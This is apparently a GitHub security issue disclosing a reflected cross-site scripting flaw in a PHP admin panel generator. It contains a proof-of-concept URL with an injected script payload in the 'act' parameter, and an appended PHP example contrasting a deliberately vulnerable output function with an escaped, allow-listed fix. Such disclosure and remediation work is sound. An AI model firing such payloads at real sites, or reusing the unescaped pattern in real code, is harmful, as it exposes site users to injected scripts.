Cross-Site Scripting (XSS) - Security Issue  #19

Open
@s7safe

Description

Affected software: php-mysql-admin-panel-generator

Version: N/A

Type of vulnerability: XSS (Cross-Site Scripting)

Author: s7safe

Description:
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages; other users will be affected when viewing those pages.

Log in to the system.
[Image]

PoC:
Go to http://192.168.146.130/generated/mysql2022-03-26_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E

Payload: "><ScRiPt>alert("xss")<%2FsCrIpT>

Successful

[Image]

Reason:
Failure to filter or escape special characters leads to vulnerabilities.

How to fix:
Escape special characters or filter them.

by s7safe
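
The fix suggested in the report, as an added example that is not part of the original issue and not the project's own code. The source of `edit-db.php` is not shown here, so the form markup, the function names and the allowed action names below are assumptions made for illustration; only the `act` parameter and the payload come from the report.

```php
<?php
// Added example. Hypothetical stand-in for a page that reflects the `act`
// query parameter; the real edit-db.php source is not shown in the issue.

// Vulnerable pattern: the request value is copied into an HTML attribute
// unescaped, so a leading `">` closes the attribute and the tag.
function render_form_vulnerable(string $act): string
{
    return '<form method="post" action="edit-db.php?act=' . $act . '">';
}

// Fix, part 1 (filter): accept only known actions.
// These action names are assumptions, not taken from the project.
const ALLOWED_ACTIONS = ['add', 'edit', 'delete'];

function normalize_act(string $act): string
{
    // Strict comparison; anything unexpected falls back to a safe default.
    return in_array($act, ALLOWED_ACTIONS, true) ? $act : 'edit';
}

// Fix, part 2 (escape): encode for the HTML context on output.
// ENT_QUOTES matters here because the payload starts with a double quote.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_form_hardened(string $act): string
{
    // Filter first, then escape at the point of output even though the
    // value is allow-listed, so the sink stays safe if the list changes.
    return '<form method="post" action="edit-db.php?act='
        . h(normalize_act($act)) . '">';
}

// Constructed input: the URL-decoded payload from the PoC above.
$payload = '"><ScRiPt>alert("xss")</sCrIpT>';

echo "vulnerable : ", render_form_vulnerable($payload), PHP_EOL;
echo "escape only: ", h($payload), PHP_EOL;
echo "hardened   : ", render_form_hardened($payload), PHP_EOL;
```

Running it with `php` on the command line prints the three renderings side by side, which makes it easy to see that the escaped output no longer contains a raw `"`, `<` or `>`.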
